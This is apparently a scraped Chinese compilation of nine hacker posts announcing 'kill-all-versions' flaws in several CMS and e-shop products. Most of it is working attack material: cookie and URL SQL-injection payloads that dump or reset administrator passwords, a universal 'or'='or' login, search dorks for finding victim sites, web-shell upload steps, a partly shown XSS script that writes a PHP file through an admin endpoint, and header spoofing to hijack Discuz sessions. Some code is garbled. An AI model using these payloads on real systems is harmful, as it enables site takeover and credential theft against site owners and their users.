启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

下面是小编为大家推荐的启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警，本文共9篇，欢迎阅读，希望大家能够喜欢。

篇1：启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

by Mr.DzY

from www.0855.tv

由于网上开源的东西多了,版权就无从查起，这天姑且就这么称乎它吧。

具体版权无从查知，相似的内核太多。

源码下载：www.mycodes.net/25/4628.htm

：www.tb11.net/

官方演示：www.tb11.net/system/xitong/

www.tb11.net/system/xitong2/

www.tb11.net/system/xitong3/

直接上exploit:

javascript.:alert(document.cookie=“id=”+escape(“1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin”));

test:www.tb11.net/system/xitong/shownews.asp?id=210

测试关键字自己找，

篇2：简单文章管理系统 cookie注入漏洞通杀所有版本漏洞预警

简单文章管理系统采用一级分类，界面简洁，功能简单实用，删除文章后，文章相关图片也一并删除减

少垃圾文件的存在。

后台管理入口域名/admin 用户名和密码都是admin

后台模块：

信息管理: 发布信息 修改信息 查找信息 推荐信息

系统管理: 类别管理 用户管理 系统设置 数据库维护

漏洞文件：article.asp Check_SqlIn.asp 代码我就不作分析了。网上多的是，差不多的问题。

漏洞说明：过滤不严，导致可cookie注入。

好像有两个字段14和12。

exp:

javascript.:alert(document.cookie=“id=”+escape(“119 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin”));

javascript.:alert(document.cookie=“id=”+escape(“235 union select 1,2,3,user,5,password,7,8,9,10,11,12 from admin”));

利用方法我就不说了，网上很多，整天JJYY还是这点破事，

有图有真像：

拿shell方法：

暂时没有更好的办法，但是如果他的数据库是.asp .asa后缀的话，可在

www.xxx.com/data/!%article%!.asp

改变下成:www.xxx.com/data/%21%25article%25%21.asp

没对数据库访问进行处理。 ING~~~~~~~

用户管理--->增加管理员中 帐户写上一句话变型马。然后菜刀之类的连就可以了。

dork:

inurl:list.asp?classid=1 首页 上一页 下一页 尾页 页次：页 共 条记录 条记录/页 转到：

注意后面的字哦。。。^_^

From: www.0855.tv

By: Mr.DzY

篇3：V5shop 8.2版本下通杀注入漏洞漏洞预警

漏洞危害：高危

一、漏洞文件：cart.aspx

搜索关键词：inurl:scoreindex.aspx

exp ：

/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

然后针对爆出来的md5密码进行在线解密，如果顺利，就可以登陆后台，默认地址：/weblogin，输入上面的用户名和密码既可成功进入后台，（当然很多时候md5解密是没有结果的）此时需要先更新下管理员密码：

update web_admin set pass=0x4300300034003600300035003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

其中pass串先将密码转成32位，再转换成大写，再转换成sql16进制（上面串默认密码是v5shop）

完整语句为:

cart.aspx?act=buy&id=1 and (update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

)>0 --

如果顺利，就可以登陆后台，默认地址：/weblogin，输入上面的用户名和密码既可成功进入后台。

进入后台后在系统设置-参数设置-后台上传水印,水印上传那儿貌似可以上传任意文件(可以先上传asp大马，然后再上传aspx大马)，

小结：此方法基本可以做到8.2版本及以下版本通杀，最新版8.3已解决该漏洞。

修复方法：升级最新8.3版，或者临时把cart.aspx改名或做其它方法处理。

二、漏洞文件：commond.aspx

exp:

/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)

上面这个可以直接显示出管理员用户名

/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)

上面这个可以显示MD5密码

/commond.aspx?id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

上面这个用于更改管理员密码

如果顺利，管理员密码已经被更改成你指定的密码（此处默认为v5shop），然后就可以登陆后台，默认地址：/weblogin，输入上面的用户名和密码既可成功进入后台。

拿shell方法：(未验证)

系统设置->参数设置->后台上传水印.

先传ASP的马..再传ASPX马.

上传后路径：/uploadFile/Picture/*.asp

小结：此方法基本可以做到8.2版本及以下版本通杀，最新版8.3已解决该漏洞。

修复方法：升级最新8.3版，或者临时把commond.aspx改名或做其它方法处理。

提示：使用系统者可以及时升级，阅读此文者请大家仅用于学习，勿用于非法用途。

cart.aspx?act=buy&id=1 update web_admin set pass=0x43003000340036003000320045003100350036003800370030003900350038003700440036004500350043003700360046004400300034004300450037003100

作者：admin@蜡笔's Blog

篇4：云起企业建站系统通杀oday漏洞预警

话说无聊去代码网站下套程序分析分析

可到了这个云起企业建站系统 下载数挺多的 于是乎看了起来

首先看到了它的后台login.asp文件，。一看 边觉得 。。。

if request.Form(“submit”)“” then

if request.Form(“userid”)=“” or request.Form(“password”)=“” then

response.Write(“”)

response.end

end if

set rs=conn.execute(“select * from gly where uid='”&trim(request.form(“userid”))&“' and pwd='”&trim(request.form(“password”))&“'”)

if rs.eof then

response.Write(“”)

response.End

else

if rs(“IsSuper”)=1 then

session(strSession&“uid”)=“s”

session(strSession&“uidn”)=rs(“id”)

else

session(strSession&“uid”)=“n”

session(strSession&“uidn”)=rs(“id”)

end if

response.Redirect(“index.asp”)

response.End()

end if

rs.close

set rs=nothing

end if

大家 看到没只用trim函数过滤了空格，

这样一来就直接出现了从客户端传递过来的数据，直接带入数据库查询了,这样我们就可以用'or'='or'登陆了

真是啊 。。什么年代了 还有这样的情况。。。

再来看看进去后台之后的上传文件。。

部分代码：

上传文件

<%=request.QueryString(“fm”)%>&em=<%=request.QueryString(“em”)%>“ name=”form1“>

我找了很久以为还是找错了上传文件 因为我没看到上传类型的过滤代码。。

但是 确定之后 就是这个文件 因此 继续。。。

那就是说没过滤任何文件了 直接可以传咯。。

实在不怎样 。。编辑器版本由原来的ewebeditor转换为FCKeditor

后台做了安全验证 FCKeditor利用不了的 但是往往程序员忽略了最重要的漏洞。。

google关键字：inurl:arti_show.asp?id=

后台地址：management/login.asp

万能密码登陆 'or'='or'

后台可以直接上传文件

篇5：DEDECMS xss 0day 通杀所有版本漏洞预警

漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行，可getshell

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。

条件有2个：

1.开启注册

2.开启投稿

注册会员—-发表文章

内容填写：

新建xss.css,内容:

body{

background-image:url(´javascript.:document.write(”“)´)

}

新建xss.js文件,内容:

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType(´text/xml´);

}

} else if(window.ActiveXObject) {

var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

function getFolder( url ){

bj = url.split(´/´)

return obj[obj.length-2]

}

Url = top.location.href;

u = getFolder(oUrl);

add_admin();

function add_admin(){

var url= ”/“+u+”/sys_sql_query.php“;

var params =”fmdo=edit&backurl=&activepath=/data&filename=haris.php&str=

篇6：Discuz2.x3.x鸡肋通杀注入漏洞漏洞预警

首先说明这个东西价值不大，测试通杀2.x-3.x，以下的版本没看，具体的利用方法本人也没去研究，顶多mysql有file权限的时候可以getshell，当然discuz还是有不少地方有问题的，这个不能说，。。

问题出在文件uc_clientmodelbase.php 的function note_exists函数

1function note_exists { $noteexists = $this->db->fetch_first(“SELECT value FROM ”.UC_DBTABLEPRE.“vars WHERE name='noteexists”.UC_APPID.“'”); if(empty($noteexists)) { returnFALSE; } else { return TRUE; } }

标红的UC_DBTABLEPRE 常量是从configconfig_ucenter.php 文件读取出来的

标红的UC_DBTABLEPRE 常量是从configconfig_ucenter.php 文件读取出来的

而这个东西是可控的，

在后台站长->UCenter设置

更新一次，表前缀成功写入文件后，下一次更新的时候会调用note_exists函数，于是就触发了漏洞。

​

篇7：Ecmall 2.x版本存在通杀SQL注入漏洞漏洞预警

简要描述：

本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错...

详细说明：

order by 参数注入,后面不能跟union,但是可以用双重查询.

select...from...order by 1 and (select user_name from ecm_member where user_id=1)

或者

select...from...order by 1,(select user_name from ecm_member where user_id=1)

但是在第2个select里面可以用union

select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)

或

select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)

app/my_goods.app.php

function index()

{

/* 取得店铺商品分类 */

$this->assign('sgcategories', $this->_get_sgcategory_options());

$conditions = $this->_get_conditions();

$page = $this->_get_page();

$page_nolimit = array();

$goods_list = $this->_get_goods($conditions, $page); //跟进

$all_goods = $this->_get_goods($conditions, $page_nolimit);

......

}

function _get_goods($conditions, &$page)

{

if (intval($_GET['sgcate_id']) >0)

{

$cate_mod =& bm('gcategory', array('_store_id' =>$this->_store_id));

$cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));

}

else

{

$cate_ids = 0;

}

// 标识有没有过滤条件

if ($conditions != '1 = 1' || !empty($_GET['sgcate_id']))

{

$this->assign('filtered', 1);

}

//更新排序

if (isset($_GET['sort']) && isset($_GET['order']))

{

0 = strtolower(trim($_GET['sort'])); //未过滤

$order = strtolower(trim($_GET['order']));

if (!in_array($order,array('asc','desc'))) //只限制了order,没有限制sort

{

0 = 'goods_id';

$order = 'desc';

}

}

else

{

0 = 'goods_id';

$order = 'desc';

}

if ($page)

{

$limit = $page['limit'];

$count = true;

}

else

{

$limit = '';

$count = false;

}

/* 取得商品列表 */

$goods_list = $this->_goods_mod->get_list(array(

'conditions' =>$conditions,

'count' =>$count,

'order' =>“0 $order”, //select...from...order by 注入

'limit' =>$limit,

), $cate_ids);

return $goods_list;

}

includes/models/goods.model.php

function get_list($params = array(), $scate_ids = array(), $desc = false, $no_picture = true)

{

is_int($scate_ids) && $scate_ids >0 && $scate_ids = array($scate_ids);

extract($this->_initFindParams($params));//将上面数组的键名作为变量名,值作为变量的值(包含$order变量).

......

/* 条件(WHERE) */

$conditions = $this->_getConditions($conditions, true);

$conditions .= “ AND gs.spec_id IS NOT NULL AND s.store_id IS NOT NULL ”;

if ($scate_ids)

{

......

}

/* 排序(ORDER BY) */

if ($order)

{

$order = ' ORDER BY ' . $this->getRealFields($order) . ', s.sort_order '; //跟进

}

/* 分页(LIMIT) */

$limit && $limit = ' LIMIT ' . $limit;

if ($count)

{

$this->_updateLastQueryCount(“SELECT COUNT(*) as c FROM {$tables}{$conditions}”);

}

/* 完整的SQL */

$this->temp = $tables . $conditions;

$sql = “SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}”;

$goods_list = $index_key ? $this->db->getAllWithIndex($sql, $index_key) : $this->db->getAll($sql); //带入查询

......

}

eccore/model/model.base.php

function getRealFields($src_fields_list)

{

$fields = $src_fields_list;

if (!$src_fields_list)

{

$fields = '';

}

$fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', “\$this->_getFieldTable('\\1') . '.\\2'”, $fields); //正则无影响...

return $fields;

}

localhost/ecmall/index.php?app=my_goods&act=index&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23

漏洞证明：

篇8：86cmsSP6 企业建站系统 0day漏洞预警

这个是比较无语的，跟之前发布出来的那套是一模一样的。。真不知道到底是谁在抄谁的

继续

直接利用就可以拿shell 了，

配置IIS6.0

关键词大家去找吧。。我不喜欢批量

篇9：DISCUZ所有版本COOKIE劫持方法+DEMO漏洞预警

DISCUZ和很多论坛都无法进行会话劫持，因为会话和IP绑定了，DISCUZ主要的会话认证机制如下：

/inlude/common.inc.php

//第136行 验证会话重要的一段就是从sessions表中查询SID，其中一个重要的条件就是$onlineip，如果$onlineip和sessions表中的IP信息无法对应，就不能继续建立sessions表中保存的会话，

――――――――――――――――――――――――――C

代码:

if($sid) {

if($discuz_uid) {

$query = $db->query(“SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, s.pageviews AS spageviews, s.lastolupdate, s.seccode, $membertablefields

FROM {$tablepre}sessions s, {$tablepre}members m

WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid'

AND m.password='$discuz_pw' AND m.secques='$discuz_secques'”);

//79行 $onlineip首先取自HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头

------------------------------------------------------------------------------

if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {

$onlineip = getenv('HTTP_CLIENT_IP');

} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {

$onlineip = getenv('HTTP_X_FORWARDED_FOR');

} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {

$onlineip = getenv('REMOTE_ADDR');

} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], ‘unknown’)) {

$onlineip = $_SERVER['REMOTE_ADDR'];

}

所以如果我们伪造HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头就可以绕过IP绑定，

★阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警

★马克斯CMScookies注入漏洞漏洞预警

★XPSHOP商城系统Cookies欺骗漏洞漏洞预警

★淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

★青创文章系统简单分析漏洞预警

★高危漏洞CVE0027 EXP，影响IE所有版本漏洞预警

★Apple QuickTime信息泄露漏洞漏洞预警

★iShowMusic V1.2 写入shell漏洞漏洞预警

★在线支付逻辑漏洞总结漏洞预警

★elasticsearch 漏洞利用工具套装漏洞预警

《启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警（共9篇）.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式